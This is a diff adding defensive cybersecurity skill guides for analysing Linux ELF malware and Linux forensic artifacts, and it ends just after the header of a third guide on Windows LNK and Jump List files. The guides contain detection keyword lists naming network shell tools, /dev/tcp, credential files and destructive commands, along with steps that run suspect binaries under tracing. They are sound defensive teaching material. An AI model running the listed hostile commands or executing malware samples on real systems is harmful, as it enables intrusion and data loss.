@@ -0,0 +1,331 @@
|
||||
---
|
||||
name: analyzing-linux-elf-malware
|
||||
description: >
|
||||
Analyzes malicious Linux ELF (Executable and Linkable Format) binaries including botnets,
|
||||
cryptominers, ransomware, and rootkits targeting Linux servers, containers, and cloud
|
||||
infrastructure. Covers static analysis, dynamic tracing, and reverse engineering of
|
||||
x86_64 and ARM ELF samples. Activates for requests involving Linux malware analysis,
|
||||
ELF binary investigation, Linux server compromise assessment, or container malware analysis.
|
||||
domain: cybersecurity
|
||||
subdomain: malware-analysis
|
||||
tags: [malware, Linux, ELF, reverse-engineering, server-malware]
|
||||
version: 1.0.0
|
||||
author: mahipal
|
||||
license: MIT
|
||||
---
|
||||
|
||||
# Analyzing Linux ELF Malware
|
||||
|
||||
## When to Use
|
||||
|
||||
- A Linux server or container has been compromised and suspicious ELF binaries are found
|
||||
- Analyzing Linux botnets (Mirai, Gafgyt, XorDDoS), cryptominers, or ransomware
|
||||
- Investigating malware targeting cloud infrastructure, Docker containers, or Kubernetes pods
|
||||
- Reverse engineering Linux rootkits and kernel modules
|
||||
- Analyzing cross-platform malware compiled for Linux x86_64, ARM, or MIPS architectures
|
||||
|
||||
**Do not use** for Windows PE binary analysis; use PEStudio, Ghidra, or IDA for Windows malware.
|
||||
|
||||
## Prerequisites
|
||||
|
||||
- Ghidra or IDA with Linux ELF support for disassembly and decompilation
|
||||
- Linux analysis VM (Ubuntu 22.04 recommended) with development tools installed
|
||||
- strace, ltrace, and GDB for dynamic analysis and debugging
|
||||
- readelf, objdump, and nm from GNU binutils for static inspection
|
||||
- Radare2 for quick binary triage and scripted analysis
|
||||
- Docker for isolated container-based malware execution
|
||||
|
||||
## Workflow
|
||||
|
||||
### Step 1: Identify ELF Binary Properties
|
||||
|
||||
Examine the ELF header and basic properties:
|
||||
|
||||
```bash
|
||||
# File type identification
|
||||
file suspect_binary
|
||||
|
||||
# Detailed ELF header analysis
|
||||
readelf -h suspect_binary
|
||||
|
||||
# Section headers
|
||||
readelf -S suspect_binary
|
||||
|
||||
# Program headers (segments)
|
||||
readelf -l suspect_binary
|
||||
|
||||
# Symbol table (if not stripped)
|
||||
readelf -s suspect_binary
|
||||
nm suspect_binary 2>/dev/null
|
||||
|
||||
# Dynamic linking information
|
||||
readelf -d suspect_binary
|
||||
ldd suspect_binary 2>/dev/null # Only on matching architecture!
|
||||
|
||||
# Compute hashes
|
||||
md5sum suspect_binary
|
||||
sha256sum suspect_binary
|
||||
|
||||
# Check for packing/UPX
|
||||
upx -t suspect_binary
|
||||
```
|
||||
|
||||
```python
|
||||
# Python-based ELF analysis
|
||||
from elftools.elf.elffile import ELFFile
|
||||
import hashlib
|
||||
|
||||
with open("suspect_binary", "rb") as f:
|
||||
data = f.read()
|
||||
sha256 = hashlib.sha256(data).hexdigest()
|
||||
|
||||
with open("suspect_binary", "rb") as f:
|
||||
elf = ELFFile(f)
|
||||
|
||||
print(f"SHA-256: {sha256}")
|
||||
print(f"Class: {elf.elfclass}-bit")
|
||||
print(f"Endian: {elf.little_endian and 'Little' or 'Big'}")
|
||||
print(f"Machine: {elf.header.e_machine}")
|
||||
print(f"Type: {elf.header.e_type}")
|
||||
print(f"Entry Point: 0x{elf.header.e_entry:X}")
|
||||
|
||||
# Check if stripped
|
||||
symtab = elf.get_section_by_name('.symtab')
|
||||
print(f"Stripped: {'Yes' if symtab is None else 'No'}")
|
||||
|
||||
# Section entropy analysis
|
||||
import math
|
||||
from collections import Counter
|
||||
for section in elf.iter_sections():
|
||||
data = section.data()
|
||||
if len(data) > 0:
|
||||
entropy = -sum((c/len(data)) * math.log2(c/len(data))
|
||||
for c in Counter(data).values() if c > 0)
|
||||
if entropy > 7.0:
|
||||
print(f" [!] High entropy section: {section.name} ({entropy:.2f})")
|
||||
```
|
||||
|
||||
### Step 2: Extract Strings and Indicators
|
||||
|
||||
Search for embedded IOCs and functionality clues:
|
||||
|
||||
```bash
|
||||
# ASCII strings
|
||||
strings suspect_binary > strings_output.txt
|
||||
|
||||
# Search for network indicators
|
||||
grep -iE "(http|https|ftp)://" strings_output.txt
|
||||
grep -iE "([0-9]{1,3}\.){3}[0-9]{1,3}" strings_output.txt
|
||||
grep -iE "[a-zA-Z0-9.-]+\.(com|net|org|io|ru|cn)" strings_output.txt
|
||||
|
||||
# Search for shell commands
|
||||
grep -iE "(bash|sh|wget|curl|chmod|/tmp/|/dev/)" strings_output.txt
|
||||
|
||||
# Search for crypto mining indicators
|
||||
grep -iE "(stratum|xmr|monero|pool\.|mining)" strings_output.txt
|
||||
|
||||
# Search for SSH/credential theft
|
||||
grep -iE "(ssh|authorized_keys|id_rsa|shadow|passwd)" strings_output.txt
|
||||
|
||||
# Search for persistence mechanisms
|
||||
grep -iE "(crontab|systemd|init\.d|rc\.local|ld\.so\.preload)" strings_output.txt
|
||||
|
||||
# FLOSS for obfuscated strings (if available)
|
||||
floss suspect_binary
|
||||
```
|
||||
|
||||
### Step 3: Analyze System Calls and Library Usage
|
||||
|
||||
Identify what system calls and libraries the malware uses:
|
||||
|
||||
```bash
|
||||
# List imported functions (dynamically linked)
|
||||
readelf -r suspect_binary | grep -E "socket|connect|exec|fork|open|write|bind|listen"
|
||||
|
||||
# Trace system calls during execution (in isolated VM only)
|
||||
strace -f -e trace=network,process,file -o strace_output.txt ./suspect_binary
|
||||
|
||||
# Trace library calls
|
||||
ltrace -f -o ltrace_output.txt ./suspect_binary
|
||||
|
||||
# Key system calls to watch:
|
||||
# Network: socket, connect, bind, listen, accept, sendto, recvfrom
|
||||
# Process: fork, execve, clone, kill, ptrace
|
||||
# File: open, read, write, unlink, rename, chmod
|
||||
# Persistence: inotify_add_watch (file monitoring)
|
||||
```
|
||||
|
||||
### Step 4: Dynamic Analysis with GDB
|
||||
|
||||
Debug the malware to observe runtime behavior:
|
||||
|
||||
```bash
|
||||
# Start GDB with the binary
|
||||
gdb ./suspect_binary
|
||||
|
||||
# Set breakpoints on key functions
|
||||
(gdb) break main
|
||||
(gdb) break socket
|
||||
(gdb) break connect
|
||||
(gdb) break execve
|
||||
(gdb) break fork
|
||||
|
||||
# Run and analyze
|
||||
(gdb) run
|
||||
(gdb) info registers # View register state
|
||||
(gdb) x/20s $rdi # Examine string argument
|
||||
(gdb) bt # Backtrace
|
||||
(gdb) continue
|
||||
|
||||
# For stripped binaries, break on entry point
|
||||
(gdb) break *0x400580 # Entry point from readelf
|
||||
(gdb) run
|
||||
|
||||
# Monitor network connections during execution
|
||||
# In another terminal:
|
||||
ss -tlnp # List listening sockets
|
||||
ss -tnp # List established connections
|
||||
```
|
||||
|
||||
### Step 5: Reverse Engineer with Ghidra
|
||||
|
||||
Perform deep code analysis on the ELF binary:
|
||||
|
||||
```
|
||||
Ghidra Analysis for Linux ELF:
|
||||
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
|
||||
1. Import: File -> Import -> Select ELF binary
|
||||
- Ghidra auto-detects ELF format and architecture
|
||||
- Accept default analysis options
|
||||
|
||||
2. Key analysis targets:
|
||||
- main() function (or entry point if stripped)
|
||||
- Socket creation and connection functions
|
||||
- Command dispatch logic (switch/case on received data)
|
||||
- Encryption/encoding routines
|
||||
- Persistence installation code
|
||||
- Self-propagation/scanning functions
|
||||
|
||||
3. For Mirai-like botnets, look for:
|
||||
- Credential list for brute-forcing (telnet/SSH)
|
||||
- Attack module selection (UDP flood, SYN flood, ACK flood)
|
||||
- Scanner module (port scanning for vulnerable devices)
|
||||
- Killer module (killing competing botnets)
|
||||
|
||||
4. For cryptominers, look for:
|
||||
- Mining pool connection (stratum protocol)
|
||||
- Wallet address strings
|
||||
- CPU/GPU utilization functions
|
||||
- Process hiding techniques
|
||||
```
|
||||
|
||||
### Step 6: Analyze Linux-Specific Persistence
|
||||
|
||||
Check for persistence mechanisms:
|
||||
|
||||
```bash
|
||||
# Check for LD_PRELOAD rootkit
|
||||
strings suspect_binary | grep "ld.so.preload"
|
||||
# Malware writing to /etc/ld.so.preload can hook all dynamic library calls
|
||||
|
||||
# Check for crontab persistence
|
||||
strings suspect_binary | grep -i "cron"
|
||||
|
||||
# Check for systemd service creation
|
||||
strings suspect_binary | grep -iE "systemd|\.service|systemctl"
|
||||
|
||||
# Check for init script creation
|
||||
strings suspect_binary | grep -iE "init\.d|rc\.local|update-rc"
|
||||
|
||||
# Check for SSH key injection
|
||||
strings suspect_binary | grep -i "authorized_keys"
|
||||
|
||||
# Check for kernel module (rootkit) loading
|
||||
strings suspect_binary | grep -iE "insmod|modprobe|init_module"
|
||||
|
||||
# Check for process hiding
|
||||
strings suspect_binary | grep -iE "proc|readdir|getdents"
|
||||
```
|
||||
|
||||
## Key Concepts
|
||||
|
||||
| Term | Definition |
|
||||
|------|------------|
|
||||
| **ELF (Executable and Linkable Format)** | Standard binary format for Linux executables, shared libraries, and core dumps containing headers, sections, and segments |
|
||||
| **Stripped Binary** | ELF binary with debug symbols removed, making reverse engineering more difficult as function names are lost |
|
||||
| **LD_PRELOAD** | Linux environment variable specifying shared libraries to load before all others; abused by rootkits to intercept system library calls |
|
||||
| **strace** | Linux system call tracer that logs all system calls and signals made by a process, revealing file, network, and process operations |
|
||||
| **GOT/PLT** | Global Offset Table and Procedure Linkage Table; ELF structures for dynamic linking that can be hijacked for function hooking |
|
||||
| **Statically Linked** | Binary compiled with all library code included; common in IoT malware to run on systems without matching shared libraries |
|
||||
| **Mirai** | Prolific Linux botnet targeting IoT devices via telnet brute-force; source code leaked, leading to many variants |
|
||||
|
||||
## Tools & Systems
|
||||
|
||||
- **Ghidra**: NSA reverse engineering tool with full ELF support for x86, x86_64, ARM, MIPS, and other Linux architectures
|
||||
- **Radare2**: Open-source reverse engineering framework with command-line interface for quick binary analysis and scripting
|
||||
- **strace**: Linux system call tracing tool for observing binary behavior including file, network, and process operations
|
||||
- **GDB**: GNU Debugger for setting breakpoints, examining memory, and stepping through Linux binary execution
|
||||
- **pyelftools**: Python library for parsing ELF files programmatically for automated analysis pipelines
|
||||
|
||||
## Common Scenarios
|
||||
|
||||
### Scenario: Analyzing a Cryptominer Found on a Compromised Linux Server
|
||||
|
||||
**Context**: A cloud server shows 100% CPU usage. Investigation reveals an unknown binary running from /tmp with a suspicious name. The binary needs analysis to confirm it is a cryptominer and identify the attacker's wallet and pool.
|
||||
|
||||
**Approach**:
|
||||
1. Copy the binary to an analysis VM and compute SHA-256 hash
|
||||
2. Run `file` and `readelf` to identify architecture and linking type
|
||||
3. Extract strings and search for mining pool addresses (stratum+tcp://) and wallet addresses
|
||||
4. Run with strace in a sandbox to observe network connections (mining pool connection)
|
||||
5. Import into Ghidra to identify the mining algorithm and configuration extraction
|
||||
6. Check for persistence mechanisms (crontab, systemd service, SSH keys)
|
||||
7. Document all IOCs including pool address, wallet, C2 for updates, and persistence artifacts
|
||||
|
||||
**Pitfalls**:
|
||||
- Running `ldd` on malware outside a sandbox (ldd can execute code in the binary)
|
||||
- Not checking for ARM/MIPS architecture before attempting x86_64 execution
|
||||
- Missing companion scripts (.sh files) that may handle persistence and cleanup
|
||||
- Ignoring the initial access vector (how the miner was deployed: SSH brute force, web exploit, container escape)
|
||||
|
||||
## Output Format
|
||||
|
||||
```
|
||||
LINUX ELF MALWARE ANALYSIS REPORT
|
||||
====================================
|
||||
File: /tmp/.X11-unix/.rsync
|
||||
SHA-256: e3b0c44298fc1c149afbf4c8996fb924...
|
||||
Type: ELF 64-bit LSB executable, x86-64
|
||||
Linking: Statically linked (all libraries embedded)
|
||||
Stripped: Yes
|
||||
Size: 2,847,232 bytes
|
||||
Packer: UPX 3.96 (unpacked for analysis)
|
||||
|
||||
CLASSIFICATION
|
||||
Family: XMRig Cryptominer (modified)
|
||||
Variant: Custom build with C2 update mechanism
|
||||
|
||||
FUNCTIONALITY
|
||||
[*] XMR (Monero) mining via RandomX algorithm
|
||||
[*] Stratum pool connection for work submission
|
||||
[*] C2 check-in for configuration updates
|
||||
[*] Process name masquerading (argv[0] = "[kworker/0:0]")
|
||||
[*] Competitor process killing (kills other miners)
|
||||
[*] SSH key injection for re-access
|
||||
|
||||
NETWORK INDICATORS
|
||||
Mining Pool: stratum+tcp://pool.minexmr[.]com:4444
|
||||
C2 Server: hxxp://update.malicious[.]com/config
|
||||
Wallet: 49jZ5Q3b...Monero_Wallet_Address...
|
||||
|
||||
PERSISTENCE
|
||||
[1] Crontab entry: */5 * * * * /tmp/.X11-unix/.rsync
|
||||
[2] SSH key added to /root/.ssh/authorized_keys
|
||||
[3] Systemd service: /etc/systemd/system/rsync-daemon.service
|
||||
[4] Modified /etc/ld.so.preload for process hiding
|
||||
|
||||
PROCESS HIDING
|
||||
LD_PRELOAD: /usr/lib/.libsystem.so
|
||||
Hook: readdir() to hide /tmp/.X11-unix/.rsync from ls
|
||||
Hook: fopen() to hide from /proc/*/maps reading
|
||||
```
|
||||
@@ -0,0 +1,320 @@
|
||||
---
|
||||
name: analyzing-linux-system-artifacts
|
||||
description: Examine Linux system artifacts including auth logs, cron jobs, shell history, and system configuration to uncover evidence of compromise or unauthorized activity.
|
||||
domain: cybersecurity
|
||||
subdomain: digital-forensics
|
||||
tags: [forensics, linux-forensics, system-artifacts, log-analysis, persistence-detection, incident-investigation]
|
||||
version: "1.0"
|
||||
author: mahipal
|
||||
license: MIT
|
||||
---
|
||||
|
||||
# Analyzing Linux System Artifacts
|
||||
|
||||
## When to Use
|
||||
- When investigating a compromised Linux server or workstation
|
||||
- For identifying persistence mechanisms (cron, systemd, SSH keys)
|
||||
- When tracing user activity through shell history and authentication logs
|
||||
- During incident response to determine the scope of a Linux-based breach
|
||||
- For detecting rootkits, backdoors, and unauthorized modifications
|
||||
|
||||
## Prerequisites
|
||||
- Forensic image or live access to the Linux system (read-only)
|
||||
- Understanding of Linux file system hierarchy (FHS)
|
||||
- Knowledge of common Linux logging locations (/var/log/)
|
||||
- Tools: chkrootkit, rkhunter, AIDE, auditd logs
|
||||
- Familiarity with systemd, cron, and PAM configurations
|
||||
- Root access for complete artifact collection
|
||||
|
||||
## Workflow
|
||||
|
||||
### Step 1: Mount and Collect System Artifacts
|
||||
|
||||
```bash
|
||||
# Mount forensic image read-only
|
||||
mount -o ro,loop,offset=$((2048*512)) /cases/case-2024-001/images/linux_evidence.dd /mnt/evidence
|
||||
|
||||
# Create collection directories
|
||||
mkdir -p /cases/case-2024-001/linux/{logs,config,users,persistence,network}
|
||||
|
||||
# Collect authentication logs
|
||||
cp /mnt/evidence/var/log/auth.log* /cases/case-2024-001/linux/logs/
|
||||
cp /mnt/evidence/var/log/secure* /cases/case-2024-001/linux/logs/
|
||||
cp /mnt/evidence/var/log/syslog* /cases/case-2024-001/linux/logs/
|
||||
cp /mnt/evidence/var/log/kern.log* /cases/case-2024-001/linux/logs/
|
||||
cp /mnt/evidence/var/log/audit/audit.log* /cases/case-2024-001/linux/logs/
|
||||
cp /mnt/evidence/var/log/wtmp /cases/case-2024-001/linux/logs/
|
||||
cp /mnt/evidence/var/log/btmp /cases/case-2024-001/linux/logs/
|
||||
cp /mnt/evidence/var/log/lastlog /cases/case-2024-001/linux/logs/
|
||||
cp /mnt/evidence/var/log/faillog /cases/case-2024-001/linux/logs/
|
||||
|
||||
# Collect user artifacts
|
||||
for user_dir in /mnt/evidence/home/*/; do
|
||||
username=$(basename "$user_dir")
|
||||
mkdir -p /cases/case-2024-001/linux/users/$username
|
||||
cp "$user_dir"/.bash_history /cases/case-2024-001/linux/users/$username/ 2>/dev/null
|
||||
cp "$user_dir"/.zsh_history /cases/case-2024-001/linux/users/$username/ 2>/dev/null
|
||||
cp -r "$user_dir"/.ssh/ /cases/case-2024-001/linux/users/$username/ 2>/dev/null
|
||||
cp "$user_dir"/.bashrc /cases/case-2024-001/linux/users/$username/ 2>/dev/null
|
||||
cp "$user_dir"/.profile /cases/case-2024-001/linux/users/$username/ 2>/dev/null
|
||||
cp "$user_dir"/.viminfo /cases/case-2024-001/linux/users/$username/ 2>/dev/null
|
||||
cp "$user_dir"/.wget-hsts /cases/case-2024-001/linux/users/$username/ 2>/dev/null
|
||||
cp "$user_dir"/.python_history /cases/case-2024-001/linux/users/$username/ 2>/dev/null
|
||||
done
|
||||
|
||||
# Collect root user artifacts
|
||||
cp /mnt/evidence/root/.bash_history /cases/case-2024-001/linux/users/root/ 2>/dev/null
|
||||
cp -r /mnt/evidence/root/.ssh/ /cases/case-2024-001/linux/users/root/ 2>/dev/null
|
||||
|
||||
# Collect system configuration
|
||||
cp /mnt/evidence/etc/passwd /cases/case-2024-001/linux/config/
|
||||
cp /mnt/evidence/etc/shadow /cases/case-2024-001/linux/config/
|
||||
cp /mnt/evidence/etc/group /cases/case-2024-001/linux/config/
|
||||
cp /mnt/evidence/etc/sudoers /cases/case-2024-001/linux/config/
|
||||
cp -r /mnt/evidence/etc/sudoers.d/ /cases/case-2024-001/linux/config/
|
||||
cp /mnt/evidence/etc/hosts /cases/case-2024-001/linux/config/
|
||||
cp /mnt/evidence/etc/resolv.conf /cases/case-2024-001/linux/config/
|
||||
cp -r /mnt/evidence/etc/ssh/ /cases/case-2024-001/linux/config/
|
||||
```
|
||||
|
||||
### Step 2: Analyze User Accounts and Authentication
|
||||
|
||||
```bash
|
||||
# Analyze user accounts for anomalies
|
||||
python3 << 'PYEOF'
|
||||
print("=== USER ACCOUNT ANALYSIS ===\n")
|
||||
|
||||
# Parse /etc/passwd
|
||||
with open('/cases/case-2024-001/linux/config/passwd') as f:
|
||||
for line in f:
|
||||
parts = line.strip().split(':')
|
||||
if len(parts) >= 7:
|
||||
username, _, uid, gid, comment, home, shell = parts[0], parts[1], int(parts[2]), int(parts[3]), parts[4], parts[5], parts[6]
|
||||
|
||||
# Flag accounts with UID 0 (root equivalent)
|
||||
if uid == 0 and username != 'root':
|
||||
print(f" ALERT: UID 0 account: {username} (shell: {shell})")
|
||||
|
||||
# Flag accounts with login shells that shouldn't have them
|
||||
if shell not in ('/bin/false', '/usr/sbin/nologin', '/bin/sync') and uid >= 1000:
|
||||
print(f" User: {username} (UID:{uid}, Shell:{shell}, Home:{home})")
|
||||
|
||||
# Flag system accounts with login shells
|
||||
if uid < 1000 and uid > 0 and shell in ('/bin/bash', '/bin/sh', '/bin/zsh'):
|
||||
print(f" WARNING: System account with shell: {username} (UID:{uid}, Shell:{shell})")
|
||||
|
||||
# Parse /etc/shadow for account status
|
||||
print("\n=== PASSWORD STATUS ===")
|
||||
with open('/cases/case-2024-001/linux/config/shadow') as f:
|
||||
for line in f:
|
||||
parts = line.strip().split(':')
|
||||
if len(parts) >= 3:
|
||||
username = parts[0]
|
||||
pwd_hash = parts[1]
|
||||
last_change = parts[2]
|
||||
|
||||
if pwd_hash and pwd_hash not in ('*', '!', '!!', ''):
|
||||
hash_type = 'Unknown'
|
||||
if pwd_hash.startswith('$6$'): hash_type = 'SHA-512'
|
||||
elif pwd_hash.startswith('$5$'): hash_type = 'SHA-256'
|
||||
elif pwd_hash.startswith('$y$'): hash_type = 'yescrypt'
|
||||
elif pwd_hash.startswith('$1$'): hash_type = 'MD5 (WEAK)'
|
||||
print(f" {username}: {hash_type} hash, last changed: day {last_change}")
|
||||
PYEOF
|
||||
|
||||
# Analyze login history
|
||||
last -f /cases/case-2024-001/linux/logs/wtmp > /cases/case-2024-001/linux/analysis/login_history.txt
|
||||
lastb -f /cases/case-2024-001/linux/logs/btmp > /cases/case-2024-001/linux/analysis/failed_logins.txt 2>/dev/null
|
||||
```
|
||||
|
||||
### Step 3: Examine Persistence Mechanisms
|
||||
|
||||
```bash
|
||||
# Check cron jobs for all users
|
||||
echo "=== CRON JOBS ===" > /cases/case-2024-001/linux/persistence/cron_analysis.txt
|
||||
|
||||
# System cron
|
||||
for cronfile in /mnt/evidence/etc/crontab /mnt/evidence/etc/cron.d/*; do
|
||||
echo "--- $cronfile ---" >> /cases/case-2024-001/linux/persistence/cron_analysis.txt
|
||||
cat "$cronfile" 2>/dev/null >> /cases/case-2024-001/linux/persistence/cron_analysis.txt
|
||||
echo "" >> /cases/case-2024-001/linux/persistence/cron_analysis.txt
|
||||
done
|
||||
|
||||
# User cron tabs
|
||||
for cronfile in /mnt/evidence/var/spool/cron/crontabs/*; do
|
||||
echo "--- User crontab: $(basename $cronfile) ---" >> /cases/case-2024-001/linux/persistence/cron_analysis.txt
|
||||
cat "$cronfile" 2>/dev/null >> /cases/case-2024-001/linux/persistence/cron_analysis.txt
|
||||
echo "" >> /cases/case-2024-001/linux/persistence/cron_analysis.txt
|
||||
done
|
||||
|
||||
# Check systemd services for persistence
|
||||
echo "=== SYSTEMD SERVICES ===" > /cases/case-2024-001/linux/persistence/systemd_analysis.txt
|
||||
find /mnt/evidence/etc/systemd/system/ -name "*.service" -newer /mnt/evidence/etc/os-release \
|
||||
>> /cases/case-2024-001/linux/persistence/systemd_analysis.txt
|
||||
|
||||
for svc in /mnt/evidence/etc/systemd/system/*.service; do
|
||||
echo "--- $(basename $svc) ---" >> /cases/case-2024-001/linux/persistence/systemd_analysis.txt
|
||||
cat "$svc" >> /cases/case-2024-001/linux/persistence/systemd_analysis.txt
|
||||
echo "" >> /cases/case-2024-001/linux/persistence/systemd_analysis.txt
|
||||
done
|
||||
|
||||
# Check authorized SSH keys (backdoor detection)
|
||||
echo "=== SSH AUTHORIZED KEYS ===" > /cases/case-2024-001/linux/persistence/ssh_keys.txt
|
||||
find /mnt/evidence/home/ /mnt/evidence/root/ -name "authorized_keys" -exec sh -c \
|
||||
'echo "--- {} ---"; cat {}; echo ""' \; >> /cases/case-2024-001/linux/persistence/ssh_keys.txt
|
||||
|
||||
# Check rc.local and init scripts
|
||||
cat /mnt/evidence/etc/rc.local 2>/dev/null > /cases/case-2024-001/linux/persistence/rc_local.txt
|
||||
|
||||
# Check /etc/profile.d/ for login-triggered scripts
|
||||
ls -la /mnt/evidence/etc/profile.d/ > /cases/case-2024-001/linux/persistence/profile_scripts.txt
|
||||
|
||||
# Check for LD_PRELOAD hijacking
|
||||
grep -r "LD_PRELOAD" /mnt/evidence/etc/ 2>/dev/null > /cases/case-2024-001/linux/persistence/ld_preload.txt
|
||||
cat /mnt/evidence/etc/ld.so.preload 2>/dev/null >> /cases/case-2024-001/linux/persistence/ld_preload.txt
|
||||
```
|
||||
|
||||
### Step 4: Analyze Shell History and Command Execution
|
||||
|
||||
```bash
|
||||
# Analyze bash history for each user
|
||||
python3 << 'PYEOF'
|
||||
import os, glob
|
||||
|
||||
print("=== SHELL HISTORY ANALYSIS ===\n")
|
||||
|
||||
suspicious_commands = [
|
||||
'wget', 'curl', 'nc ', 'ncat', 'netcat', 'python -c', 'python3 -c',
|
||||
'perl -e', 'base64', 'chmod 777', 'chmod +s', '/dev/tcp', '/dev/udp',
|
||||
'nmap', 'masscan', 'hydra', 'john', 'hashcat', 'passwd', 'useradd',
|
||||
'iptables -F', 'ufw disable', 'history -c', 'rm -rf /', 'dd if=',
|
||||
'crontab', 'at ', 'systemctl enable', 'ssh-keygen', 'scp ', 'rsync',
|
||||
'tar czf', 'zip -r', 'openssl enc', 'gpg --encrypt', 'shred',
|
||||
'chattr', 'setfacl', 'awk', '/tmp/', '/dev/shm/'
|
||||
]
|
||||
|
||||
for hist_file in glob.glob('/cases/case-2024-001/linux/users/*/.bash_history'):
|
||||
username = hist_file.split('/')[-2]
|
||||
print(f"User: {username}")
|
||||
|
||||
with open(hist_file, 'r', errors='ignore') as f:
|
||||
lines = f.readlines()
|
||||
|
||||
print(f" Total commands: {len(lines)}")
|
||||
flagged = []
|
||||
for i, line in enumerate(lines):
|
||||
line = line.strip()
|
||||
for cmd in suspicious_commands:
|
||||
if cmd in line.lower():
|
||||
flagged.append((i+1, line))
|
||||
break
|
||||
|
||||
if flagged:
|
||||
print(f" Suspicious commands: {len(flagged)}")
|
||||
for lineno, cmd in flagged:
|
||||
print(f" Line {lineno}: {cmd[:120]}")
|
||||
print()
|
||||
PYEOF
|
||||
```
|
||||
|
||||
### Step 5: Check for Rootkits and Modified Binaries
|
||||
|
||||
```bash
|
||||
# Check for known rootkit indicators
|
||||
# Compare system binary hashes against known-good
|
||||
find /mnt/evidence/usr/bin/ /mnt/evidence/usr/sbin/ /mnt/evidence/bin/ /mnt/evidence/sbin/ \
|
||||
-type f -executable -exec sha256sum {} \; > /cases/case-2024-001/linux/analysis/binary_hashes.txt
|
||||
|
||||
# Check for SUID/SGID binaries (potential privilege escalation)
|
||||
find /mnt/evidence/ -perm -4000 -type f 2>/dev/null > /cases/case-2024-001/linux/analysis/suid_files.txt
|
||||
find /mnt/evidence/ -perm -2000 -type f 2>/dev/null > /cases/case-2024-001/linux/analysis/sgid_files.txt
|
||||
|
||||
# Check for suspicious files in /tmp and /dev/shm
|
||||
find /mnt/evidence/tmp/ /mnt/evidence/dev/shm/ -type f 2>/dev/null \
|
||||
-exec file {} \; > /cases/case-2024-001/linux/analysis/tmp_files.txt
|
||||
|
||||
# Check for hidden files and directories
|
||||
find /mnt/evidence/ -name ".*" -not -path "*/\." -type f 2>/dev/null | \
|
||||
head -100 > /cases/case-2024-001/linux/analysis/hidden_files.txt
|
||||
|
||||
# Check kernel modules
|
||||
ls -la /mnt/evidence/lib/modules/$(ls /mnt/evidence/lib/modules/ | head -1)/extra/ 2>/dev/null \
|
||||
> /cases/case-2024-001/linux/analysis/extra_modules.txt
|
||||
|
||||
# Check for modified PAM configuration (authentication backdoors)
|
||||
diff /mnt/evidence/etc/pam.d/ /cases/baseline/pam.d/ 2>/dev/null \
|
||||
> /cases/case-2024-001/linux/analysis/pam_changes.txt
|
||||
```
|
||||
|
||||
## Key Concepts
|
||||
|
||||
| Concept | Description |
|
||||
|---------|-------------|
|
||||
| /var/log/auth.log | Primary authentication log on Debian/Ubuntu systems |
|
||||
| /var/log/secure | Primary authentication log on RHEL/CentOS systems |
|
||||
| wtmp/btmp | Binary logs recording successful and failed login sessions |
|
||||
| .bash_history | User command history file (can be cleared by attackers) |
|
||||
| crontab | Scheduled task system commonly used for persistence |
|
||||
| authorized_keys | SSH public keys granting passwordless access to an account |
|
||||
| SUID bit | File permission allowing execution as the file owner (privilege escalation vector) |
|
||||
| LD_PRELOAD | Environment variable that loads a shared library before all others (hooking technique) |
|
||||
|
||||
## Tools & Systems
|
||||
|
||||
| Tool | Purpose |
|
||||
|------|---------|
|
||||
| chkrootkit | Rootkit detection scanner for Linux systems |
|
||||
| rkhunter | Rootkit Hunter - checks for rootkits, backdoors, and local exploits |
|
||||
| AIDE | Advanced Intrusion Detection Environment - file integrity monitor |
|
||||
| auditd | Linux audit framework for system call and file access monitoring |
|
||||
| last/lastb | Parse wtmp/btmp for login and failed login history |
|
||||
| Plaso/log2timeline | Super-timeline creation including Linux artifacts |
|
||||
| osquery | SQL-based system querying for live forensic investigation |
|
||||
| Velociraptor | Endpoint agent with Linux artifact collection capabilities |
|
||||
|
||||
## Common Scenarios
|
||||
|
||||
**Scenario 1: SSH Brute Force Followed by Compromise**
|
||||
Analyze auth.log for failed SSH attempts followed by success, identify the attacking IP, check .bash_history for post-compromise commands, examine authorized_keys for added backdoor keys, check crontab for persistence, review network connections.
|
||||
|
||||
**Scenario 2: Web Server Compromise via Application Vulnerability**
|
||||
Examine web server access and error logs for exploitation attempts, check /tmp and /dev/shm for webshells, analyze the web server user's activity (www-data), check for privilege escalation via SUID binaries or kernel exploits, review outbound connections.
|
||||
|
||||
**Scenario 3: Insider Threat on Database Server**
|
||||
Analyze the suspect user's bash_history for database dump commands, check for large tar/zip files in home directory or /tmp, examine scp/rsync commands for data transfer, review cron jobs for automated exfiltration, check USB device logs.
|
||||
|
||||
**Scenario 4: Crypto-Miner on Cloud Instance**
|
||||
Check for high-CPU processes in /proc (live) or systemd service files, examine crontab entries for miner restart scripts, check /tmp for mining binaries, analyze network connections for mining pool communications, review authorized_keys for attacker access.
|
||||
|
||||
## Output Format
|
||||
|
||||
```
|
||||
Linux Forensics Summary:
|
||||
System: webserver01 (Ubuntu 22.04 LTS)
|
||||
Hostname: webserver01.corp.local
|
||||
Kernel: 5.15.0-91-generic
|
||||
|
||||
User Accounts:
|
||||
Total: 25 (3 with UID 0 - 1 ANOMALOUS)
|
||||
Interactive shells: 8 users
|
||||
Recently created: admin2 (created 2024-01-15)
|
||||
|
||||
Authentication Events:
|
||||
Successful SSH logins: 456
|
||||
Failed SSH attempts: 12,345 (from 23 unique IPs)
|
||||
Sudo executions: 89
|
||||
|
||||
Persistence Mechanisms Found:
|
||||
Cron jobs: 3 suspicious (reverse shell, miner restart)
|
||||
Systemd services: 1 unknown (update-checker.service)
|
||||
SSH keys: 2 unauthorized keys in root authorized_keys
|
||||
rc.local: Modified with download cradle
|
||||
|
||||
Suspicious Activity:
|
||||
- bash_history contains wget to pastebin URL
|
||||
- SUID binary /tmp/.hidden/escalate found
|
||||
- /dev/shm/ contains compiled ELF binary
|
||||
- LD_PRELOAD in /etc/ld.so.preload pointing to /lib/.hidden.so
|
||||
|
||||
Report: /cases/case-2024-001/linux/analysis/
|
||||
```
|
||||
@@ -0,0 +1,191 @@
|
||||
---
|
||||
name: analyzing-lnk-file-and-jump-list-artifacts
|
||||
description: Analyze Windows LNK shortcut files and Jump List artifacts to establish evidence of file access, program execution, and user activity using LECmd, JLECmd, and manual binary parsing of the Shell Link Binary format.
|
||||
domain: cybersecurity
|
||||
subdomain: digital-forensics
|
||||
tags: [lnk-files, jump-lists, lecmd, jlecmd, windows-forensics, shell-link, user-activity, file-access, program-execution, recent-files]
|
||||
version: "1.0"
|
||||
author: mahipal
|
||||
license: MIT
|
||||
---
|
||||
|
||||
# Analyzing LNK File and Jump List Artifacts
|
||||
|
||||
## Overview
|
||||
|
||||
